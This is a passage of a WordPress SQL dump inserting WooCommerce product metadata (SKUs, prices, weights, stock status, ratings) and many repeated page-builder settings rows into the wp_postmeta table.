:{s:10:\"vc_grid_id\";a:0:{}}'),(34332,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34333,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34334,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34335,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34336,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34337,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34338,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34339,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34340,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34341,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34342,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34343,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34344,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34345,3119,'mkdf_show_new_sign_woo_meta','no'),(34346,3119,'slide_template','default'),(34347,3119,'_wpb_vc_js_status','false'),(34348,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34349,3120,'_sku','PR0031'),(34350,3120,'_regular_price','86'),(34351,3120,'_sale_price',''),(34352,3120,'_sale_price_dates_from',''),(34353,3120,'_sale_price_dates_to',''),(34354,3120,'total_sales','0'),(34355,3120,'_tax_status','taxable'),(34356,3120,'_tax_class',''),(34357,3120,'_manage_stock','no'),(34358,3120,'_backorders','no'),(34359,3120,'_sold_individually','no'),(34360,3120,'_weight','100'),(34361,3120,'_length',''),(34362,3120,'_width',''),(34363,3120,'_height',''),(34364,3120,'_upsell_ids','a:0:{}'),(34365,3120,'_crosssell_ids','a:0:{}'),(34366,3120,'_purchase_note',''),(34367,3120,'_default_attributes','a:0:{}'),(34368,3120,'_virtual','no'),(34369,3120,'_downloadable','no'),(34370,3120,'_product_image_gallery',''),(34371,3120,'_download_limit','-1'),(34372,3120,'_download_expiry','-1'),(34373,3120,'_thumbnail_id','274'),(34374,3120,'_stock',''),(34375,3120,'_stock_status','instock'),(34376,3120,'_wc_average_rating','5.00'),(34377,3120,'_wc_rating_count','a:1:{i:5;i:1;}'),(34378,3120,'_wc_review_count','1'),(34379,3120,'_downloadable_files','a:0:{}'),(34380,3120,'_product_attributes','a:0:{}'),(34381,3120,'_product_version','3.4.3'),(34382,3120,'_price','86'),(34383,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34384,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34385,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34386,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34387,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34388,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34389,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34390,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34391,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34392,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34393,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34394,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34395,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34396,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34397,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34398,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34399,3120,'mkdf_show_new_sign_woo_meta','yes'),(34400,3120,'slide_template','default'),(34401,3120,'_wpb_vc_js_status','false'),(34402,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34403,3121,'_sku','PR0032'),(34404,3121,'_regular_price','86'),(34405,3121,'_sale_price',''),(34406,3121,'_sale_price_dates_from',''),(34407,3121,'_sale_price_dates_to',''),(34408,3121,'total_sales','0'),(34409,3121,'_tax_status','taxable'),(34410,3121,'_tax_class',''),(34411,3121,'_manage_stock','no'),(34412,3121,'_backorders','no'),(34413,3121,'_sold_individually','no'),(34414,3121,'_weight','100'),(34415,3121,'_length',''),(34416,3121,'_width',''),(34417,3121,'_height',''),(34418,3121,'_upsell_ids','a:0:{}'),(34419,3121,'_crosssell_ids','a:0:{}'),(34420,3121,'_purchase_note',''),(34421,3121,'_default_attributes','a:0:{}'),(34422,3121,'_virtual','no'),(34423,3121,'_downloadable','no'),(34424,3121,'_product_image_gallery',''),(34425,3121,'_download_limit','-1'),(34426,3121,'_download_expiry','-1'),(34427,3121,'_thumbnail_id','277'),(34428,3121,'_stock',''),(34429,3121,'_stock_status','instock'),(34430,3121,'_wc_average_rating','4.00'),(34431,3121,'_wc_rating_count','a:1:{i:4;i:1;}'),(34432,3121,'_wc_review_count','1'),(34433,3121,'_downloadable_files','a:0:{}'),(34434,3121,'_product_attributes','a:0:{}'),(34435,3121,'_product_version','3.4.3'),(34436,3121,'_price','86'),(34437,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34438,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34439,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34440,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34441,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34442,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34443,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34444,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34445,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34446,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34447,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34448,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34449,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34450,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34451,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34452,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34453,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34454,3121,'mkdf_show_new_sign_woo_meta','no'),(34455,3121,'slide_template','default'),(34456,3121,'_wpb_vc_js_status','false'),(34457,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34458,3122,'_sku','PR0033'),(34459,3122,'_regular_price','86'),(34460,3122,'_sale_price',''),(34461,3122,'_sale_price_dates_from',''),(34462,3122,'_sale_price_dates_to',''),(34463,3122,'total_sales','0'),(34464,3122,'_tax_status','taxable'),(34465,3122,'_tax_class',''),(34466,3122,'_manage_stock','no'),(34467,3122,'_backorders','no'),(34468,3122,'_sold_individually','no'),(34469,3122,'_weight','100'),(34470,3122,'_length',''),(34471,3122,'_width',''),(34472,3122,'_height',''),(34473,3122,'_upsell_ids','a:0:{}'),(34474,3122,'_crosssell_ids','a:0:{}'),(34475,3122,'_purchase_note',''),(34476,3122,'_default_attributes','a:0:{}'),(34477,3122,'_virtual','no'),(34478,3122,'_downloadable','no'),(34479,3122,'_product_image_gallery',''),(34480,3122,'_download_limit','-1'),(34481,3122,'_download_expiry','-1'),(34482,3122,'_thumbnail_id','517'),(34483,3122,'_stock',''),(34484,3122,'_stock_status','instock'),(34485,3122,'_wc_average_rating','4.00'),(34486,3122,'_wc_rating_count','a:1:{i:4;i:1;}'),(34487,3122,'_wc_review_count','1'),(34488,3122,'_downloadable_files','a:0:{}'),(34489,3122,'_product_attributes','a:0:{}'),(34490,3122,'_product_version','3.4.3'),(34491,3122,'_price','86'),(34492,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34493,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34494,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34495,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34496,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34497,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34498,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34499,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34500,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34501,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34502,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34503,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34504,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34505,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34506,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34507,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34508,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34509,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34510,3122,'mkdf_show_new_sign_woo_meta','no'),(34511,3122,'slide_template',''),(34512,3122,'_wpb_vc_js_status','false'),(34513,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34514,528,'_sku','PR0034'),(34515,528,'_regular_price','150'),(34516,528,'_sale_price','115'),(34517,528,'_sale_price_dates_from',''),(34518,528,'_sale_price_dates_to',''),(34519,528,'total_sales','0'),(34520,528,'_tax_status','taxable'),(34521,528,'_tax_class',''),(34522,528,'_manage_stock','no'),(34523,528,'_backorders','no'),(34524,528,'_sold_individually','no'),(34525,528,'_weight','350'),(34526,528,'_length',''),(34527,528,'_width',''),(34528,528,'_height',''),(34529,528,'_upsell_ids','a:0:{}'),(34530,528,'_crosssell_ids','a:0:{}'),(34531,528,'_purchase_note',''),(34532,528,'_default_attributes','a:0:{}'),(34533,528,'_virtual','no'),(34534,528,'_downloadable','no'),(34535,528,'_product_image_gallery',''),(34536,528,'_download_limit','-1'),(34537,528,'_download_expiry','-1'),(34538,528,'_thumbnail_id','520'),(34539,528,'_stock',''),(34540,528,'_stock_status','instock'),(34541,528,'_wc_average_rating','3.00'),(34542,528,'_wc_rating_count','a:1:{i:3;i:1;}'),(34543,528,'_wc_review_count','1'),(34544,528,'_downloadable_files','a:0:{}'),(34545,528,'_product_attributes','a:0:{}'),(34546,528,'_product_version','3.4.3'),(34547,528,'_price','115'),(34548,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34549,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34550,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34551,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34552,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34553,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34554,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34555,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34556,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34557,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34558,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34559,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34560,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34561,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34562,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34563,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34564,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34565,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34566,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34567,528,'mkdf_show_new_sign_woo_meta','no'),(34568,528,'slide_template','default'),(34569,528,'_wpb_vc_js_status','false'),(34570,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34571,530,'_sku','PR0035'),(34572,530,'_regular_price','50'),(34573,530,'_sale_price',''),(34574,530,'_sale_price_dates_from',''),(34575,530,'_sale_price_dates_to',''),(34576,530,'total_sales','0'),(34577,530,'_tax_status','taxable'),(34578,530,'_tax_class',''),(34579,530,'_manage_stock','no'),(34580,530,'_backorders','no'),(34581,530,'_sold_individually','no'),(34582,530,'_weight','150'),(34583,530,'_length',''),(34584,530,'_width',''),(34585,530,'_height',''),(34586,530,'_upsell_ids','a:0:{}'),(34587,530,'_crosssell_ids','a:0:{}'),(34588,530,'_purchase_note',''),(34589,530,'_default_attributes','a:0:{}'),(34590,530,'_virtual','no'),(34591,530,'_downloadable','no'),(34592,530,'_product_image_gallery',''),(34593,530,'_download_limit','-1'),(34594,530,'_download_expiry','-1'),(34595,530,'_thumbnail_id','521'),(34596,530,'_stock',''),(34597,530,'_stock_status','instock'),(34598,530,'_wc_average_rating','5.00'),(34599,530,'_wc_rating_count','a:1:{i:5;i:1;}'),(34600,530,'_wc_review_count','1'),(34601,530,'_downloadable_files','a:0:{}'),(34602,530,'_product_attributes','a:0:{}'),(34603,530,'_product_version','3.4.3'),(34604,530,'_price','50'),(34605,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34606,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34607,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34608,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34609,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34610,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34611,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34612,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34613,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34614,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34615,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34616,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34617,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}');
INSERT INTO `wp_postmeta` VALUES (34618,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34619,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34620,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34621,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34622,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34623,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34624,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34625,530,'mkdf_show_new_sign_woo_meta','no'),(34626,530,'slide_template',''),(34627,530,'_wpb_vc_js_status','false'),(34628,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34629,3123,'_sku','PR0036'),(34630,3123,'_regular_price','100'),(34631,3123,'_sale_price',''),(34632,3123,'_sale_price_dates_from',''),(34633,3123,'_sale_price_dates_to',''),(34634,3123,'total_sales','0'),(34635,3123,'_tax_status','taxable'),(34636,3123,'_tax_class',''),(34637,3123,'_manage_stock','no'),(34638,3123,'_backorders','no'),(34639,3123,'_sold_individually','no'),(34640,3123,'_weight','100'),(34641,3123,'_length',''),(34642,3123,'_width',''),(34643,3123,'_height',''),(34644,3123,'_upsell_ids','a:0:{}'),(34645,3123,'_crosssell_ids','a:0:{}'),(34646,3123,'_purchase_note',''),(34647,3123,'_default_attributes','a:0:{}'),(34648,3123,'_virtual','no'),(34649,3123,'_downloadable','no'),(34650,3123,'_product_image_gallery',''),(34651,3123,'_download_limit','-1'),(34652,3123,'_download_expiry','-1'),(34653,3123,'_thumbnail_id','519'),(34654,3123,'_stock',''),(34655,3123,'_stock_status','outofstock'),(34656,3123,'_wc_average_rating','5.00'),(34657,3123,'_wc_rating_count','a:1:{i:5;i:1;}'),(34658,3123,'_wc_review_count','1'),(34659,3123,'_downloadable_files','a:0:{}'),(34660,3123,'_product_attributes','a:0:{}'),(34661,3123,'_product_version','3.4.3'),(34662,3123,'_price','100'),(34663,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34664,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34665,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34666,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34667,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34668,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34669,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34670,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34671,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34672,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34673,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34674,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34675,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34676,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34677,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34678,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34679,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34680,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34681,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34682,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34683,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34684,3123,'mkdf_show_new_sign_woo_meta','no'),(34685,3123,'slide_template','default'),(34686,3123,'_wpb_vc_js_status','false'),(34687,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34688,3124,'_sku','PR0037'),(34689,3124,'_regular_price','120'),(34690,3124,'_sale_price',''),(34691,3124,'_sale_price_dates_from',''),(34692,3124,'_sale_price_dates_to',''),(34693,3124,'total_sales','0'),(34694,3124,'_tax_status','taxable'),(34695,3124,'_tax_class',''),(34696,3124,'_manage_stock','no'),(34697,3124,'_backorders','no'),(34698,3124,'_sold_individually','no'),(34699,3124,'_weight','150'),(34700,3124,'_length',''),(34701,3124,'_width',''),(34702,3124,'_height',''),(34703,3124,'_upsell_ids','a:0:{}'),(34704,3124,'_crosssell_ids','a:0:{}'),(34705,3124,'_purchase_note',''),(34706,3124,'_default_attributes','a:0:{}'),(34707,3124,'_virtual','no'),(34708,3124,'_downloadable','no'),(34709,3124,'_product_image_gallery',''),(34710,3124,'_download_limit','-1'),(34711,3124,'_download_expiry','-1'),(34712,3124,'_thumbnail_id','518'),(34713,3124,'_stock',''),(34714,3124,'_stock_status','instock'),(34715,3124,'_wc_average_rating','5.00'),(34716,3124,'_wc_rating_count','a:1:{i:5;i:1;}'),(34717,3124,'_wc_review_count','1'),(34718,3124,'_downloadable_files','a:0:{}'),(34719,3124,'_product_attributes','a:0:{}'),(34720,3124,'_product_version','3.4.3'),(34721,3124,'_price','120'),(34722,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34723,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34724,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34725,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34726,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34727,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34728,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34729,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34730,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34731,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34732,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34733,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34734,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34735,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34736,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34737,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34738,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34739,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34740,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34741,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34742,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34743,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34744,3124,'mkdf_show_new_sign_woo_meta','yes'),(34745,3124,'slide_template','default'),(34746,3124,'_wpb_vc_js_status','false'),(34747,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34748,3125,'_sku','PR0038'),(34749,3125,'_regular_price','185'),(34750,3125,'_sale_price','120'),(34751,3125,'_sale_price_dates_from',''),(34752,3125,'_sale_price_dates_to',''),(34753,3125,'total_sales','0'),(34754,3125,'_tax_status','taxable'),(34755,3125,'_tax_class',''),(34756,3125,'_manage_stock','no'),(34757,3125,'_backorders','no'),(34758,3125,'_sold_individually','no'),(34759,3125,'_weight','185'),(34760,3125,'_length',''),(34761,3125,'_width',''),(34762,3125,'_height',''),(34763,3125,'_upsell_ids','a:0:{}'),(34764,3125,'_crosssell_ids','a:0:{}'),(34765,3125,'_purchase_note',''),(34766,3125,'_default_attributes','a:0:{}'),(34767,3125,'_virtual','no'),(34768,3125,'_downloadable','no'),(34769,3125,'_product_image_gallery',''),(34770,3125,'_download_limit','-1'),(34771,3125,'_download_expiry','-1'),(34772,3125,'_thumbnail_id','535'),(34773,3125,'_stock',''),(34774,3125,'_stock_status','instock'),(34775,3125,'_wc_average_rating','3.50'),(34776,3125,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(34777,3125,'_wc_review_count','2'),(34778,3125,'_downloadable_files','a:0:{}'),(34779,3125,'_product_attributes','a:0:{}'),(34780,3125,'_product_version','3.4.3'),(34781,3125,'_price','120'),(34782,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34783,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34784,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34785,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34786,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34787,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34788,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34789,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34790,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34791,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34792,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34793,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34794,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34795,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34796,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34797,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34798,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34799,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34800,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34801,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34802,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34803,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34804,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34805,3125,'mkdf_show_new_sign_woo_meta','no'),(34806,3125,'slide_template','default'),(34807,3125,'_wpb_vc_js_status','false'),(34808,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34809,3126,'_sku','PR0039'),(34810,3126,'_regular_price','200'),(34811,3126,'_sale_price',''),(34812,3126,'_sale_price_dates_from',''),(34813,3126,'_sale_price_dates_to',''),(34814,3126,'total_sales','0'),(34815,3126,'_tax_status','taxable'),(34816,3126,'_tax_class',''),(34817,3126,'_manage_stock','no'),(34818,3126,'_backorders','no'),(34819,3126,'_sold_individually','no'),(34820,3126,'_weight','185'),(34821,3126,'_length',''),(34822,3126,'_width',''),(34823,3126,'_height',''),(34824,3126,'_upsell_ids','a:0:{}'),(34825,3126,'_crosssell_ids','a:0:{}'),(34826,3126,'_purchase_note',''),(34827,3126,'_default_attributes','a:0:{}'),(34828,3126,'_virtual','no'),(34829,3126,'_downloadable','no'),(34830,3126,'_product_image_gallery',''),(34831,3126,'_download_limit','-1'),(34832,3126,'_download_expiry','-1'),(52079,4352,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34834,3126,'_stock',''),(34835,3126,'_stock_status','instock'),(34836,3126,'_wc_average_rating','0'),(34837,3126,'_wc_rating_count','a:0:{}'),(34838,3126,'_wc_review_count','0'),(34839,3126,'_downloadable_files','a:0:{}'),(34840,3126,'_product_attributes','a:0:{}'),(34841,3126,'_product_version','3.4.3'),(34842,3126,'_price','200'),(34843,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34844,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34845,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34846,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34847,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34848,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34849,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34850,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34851,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34852,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34853,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34854,3126,'_vc_post_settings','a:1